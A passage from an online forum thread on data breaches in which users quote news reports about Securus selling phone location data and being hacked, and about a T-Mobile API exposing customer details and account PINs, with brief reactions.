Last week, the New York Times reported that Securus obtains phone location data from major telcos, such as AT&T, Sprint, T-Mobile, and Verizon, and then makes this available to its customers. The system by which Securus obtains the data is typically used by marketers, but Securus provides a product for law enforcement to track phones in the US nationwide with little legal oversight, the report adds. In one case, a former sheriff of Mississippi County, Mo., used the Securus service to track other law enforcement official’s phones, according to court records.

The hacker who breached Securus provided Motherboard with several internal company files. A spreadsheet allegedly from a database marked “police” includes over 2,800 usernames, email addresses, phone numbers, and hashed passwords and security questions of Securus users, stretching from 2011 up to this year.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

tmobile api
The returned data included a customer's full name, postal address, billing account number, and in some cases information about tax identification numbers. The data also included customers' account information, such as if a bill is past-due or if the customer had their service suspended.

The data also included references to account PINs used by customers as a security question when contacting phone support. Anyone could use that information to hijack accounts
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Lorini
Posts: 8282
Joined: Wed Oct 13, 2004 8:52 am
Location: Santa Clarita, California

Re: The Data Breach Thread

Post by Lorini »

That's just stupid and thoughtless.
Black Lives Matter
Post Reply